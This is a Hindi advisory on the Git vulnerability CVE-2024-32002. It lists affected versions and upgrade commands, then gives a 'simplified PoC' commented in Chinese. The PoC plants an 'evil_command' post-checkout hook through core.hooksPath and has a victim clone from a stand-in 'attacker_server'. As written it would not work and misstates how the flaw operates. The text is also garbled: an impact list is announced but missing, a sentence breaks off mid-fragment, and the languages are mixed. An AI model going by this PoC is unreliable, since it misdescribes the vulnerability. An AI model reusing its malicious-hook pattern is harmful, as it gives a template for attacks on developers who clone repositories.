
कोई नहीं
CVE-2024-32002 Git सॉफ़्टवेयर में पाई गई एक गंभीर सुरक्षा भेद्यता है। यह भेद्यता दूरस्थ हमलावरों को विशेष रूप से तैयार किए गए Git रिपॉजिटरी के माध्यम से प्रभावित सिस्टम पर मनमाना कोड निष्पादित करने की अनुमति देती है। यह भेद्यता Git द्वारा विशिष्ट रिपॉजिटरी संचालन को संसाधित करने की प्रक्रिया में मौजूद है, और इनपुट डेटा के अपर्याप्त सत्यापन के कारण, रिमोट कोड एक्ज़ीक्यूशन (RCE) का जोखिम उत्पन्न होता है।
इस भेद्यता का सफलतापूर्वक दोहन करने से हो सकता है:
Git सॉफ़्टवेयर के निम्नलिखित संस्करण CVE-2024-32002 से प्रभावित हैं:
Versions
Default Status: unknown
affected at = 2.45.0
affected at = 2.44.0
affected at >= 2.43.0, < 2.43.4
affected at >= 2.42.0, < 2.42.2
affected at = 2.41.0
affected at >= 2.40.0, < 2.40.2
affected at < 2.39.4
CVE-2024-32002 विस्तृत जानकारी भेद्यता Git द्वारा विशिष्ट रिपॉजिटरी संचालन को संसाधित करने की प्रक्रिया में मौजूद है। जब उपयोगकर्ता किसी दुर्भावनापूर्ण Git रिपॉजिटरी को क्लोन करता है या उसके साथ इंटरैक्ट करता है, तो हमलावर विशेष रूप से तैयार किए गए रिपॉजिटरी या कमिट इतिहास के माध्यम से दुर्भावनापूर्ण कोड इंजेक्ट कर सकते हैं। पर्याप्त इनपुट सत्यापन के अभाव के कारण, ये दुर्भावनापूर्ण कोड रिपॉजिटरी संचालन निष्पादित करते समय सुरक्षा जांचों को बायपास कर सकते हैं, जिससे मनमाना कोड निष्पादन हो सकता है।
git clone, git pull) निष्पादित करता है, तो दुर्भावनापूर्ण कोड ट्रिगर होता है और निष्पादित होता है।उपयोगकर्ताओं को दृढ़ता से सलाह दी जाती है कि वे Git सॉफ़्टवेयर के नवीनतम संस्करण में अपग्रेड करें जिसमें इस भेद्यता का पैच शामिल है। फिक्स संस्करण इस प्रकार हैं:
अपग्रेड कमांड इस प्रकार हैं:
# 对于 macOS
brew upgrade git
# 对于 Ubuntu/Debian
sudo apt-get update
sudo apt-get install git
# 对于 CentOS/RHEL
sudo yum update git
CVE-2024-32002 के लिए प्रूफ-ऑफ-कॉन्सेप्ट (PoC) सार्वजनिक रूप से उपलब्ध है। नीचे एक सरलीकृत PoC उदाहरण दिया गया है:
# 攻击者创建恶意仓库
git init malicious-repo
cd malicious-repo
echo 'malicious content' > payload.txt
git add payload.txt
git commit -m "Add malicious payload"
# 通过注入恶意代码的提交历史触发漏洞
git config --local core.hooksPath .githooks
echo 'evil_command' > .githooks/post-checkout
git add .githooks
git commit -m "Add post-checkout hook"
# 受害者克隆恶意仓库时触发漏洞
git clone attacker_server/malicious-repo